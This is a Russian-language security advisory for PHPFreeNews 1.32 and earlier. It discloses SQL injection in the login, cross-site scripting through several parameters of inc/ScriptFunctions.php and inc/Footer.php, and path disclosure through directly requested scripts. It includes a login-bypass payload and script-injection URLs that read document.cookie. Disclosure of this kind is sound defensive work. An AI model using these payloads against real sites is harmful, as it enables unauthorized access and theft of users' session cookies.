Дата публикации: | 02.08.2005 |
Всего просмотров: | 1401 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2005-2637 CVE-2005-2638 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | PHPFreeNews 1.x |
Уязвимые версии: PHPFreeNews 1.32 и более ранние версии
Описание: 1. Удаленный пользователь может послать специально сформированный запрос приложению и выполнить произвольные SQL команды в базе данных. Пример: login: Admin password: ') or isnull(1/0) or ('a'='a2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры: http://[target]/[path]/inc/Footer.php?ScriptVersion= < script>alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? FullNews DisplayMode=3& NewsDir=")}//--></script> <script>alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableRatings=1&NewsDir=" )}//--></script><script> alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&NewsDir=" )}//--></script><script> alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? FullNewsDisplayMode=3&PopupWidth=")}//--></script> <script>alert(document.cookie)</script> http://[target]/[path]/inc/Script Functions.php? FullNewsDisplayMode=3&PopupHeight=")}//--></script> <script>alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupWidth=")}//--></script><script> alert(document.cookie)</script> http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupHeight=")}//--></script> <script>alert(document.cookie)</script>3. Удаленный пользователь может непосредственно обратится к сценарию и получить данные об установочной директории приложения на системе. Уязвимые сценарии: http://[target]/[path]/inc/ArchiveOldNews.php http://[target]/[path]/inc/Categori es.php http://[target]/[path]/inc/CheckLogout.php http://[target]/[path]/inc/CommentsApproval.php http://[target]/[path]/inc/Images.php http://[target]/[path]/inc/New sList.php http://[target]/[path]/inc/Password.php http://[target]/[path]/inc/Post.php http://[target]/[path]/inc/PostsApproval.php http://[target]/[path]/inc/PurgeOld News.php http://[target]/[path]/inc/SetSticky.php http://[target]/[path]/inc/SetVisible.php http://[target]/[path]/inc/Statistics.php http://[target]/[path]/inc/Templ ate.php http://[target]/[path]/inc/UserDefinedCodes.php http://[target]/[path]/inc/Users.php URL производителя: www.phpfreenews.co.uk Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | PHPFreeNews Input Validation Holes Permit Cross-Site Scripting and SQL Injection Attacks |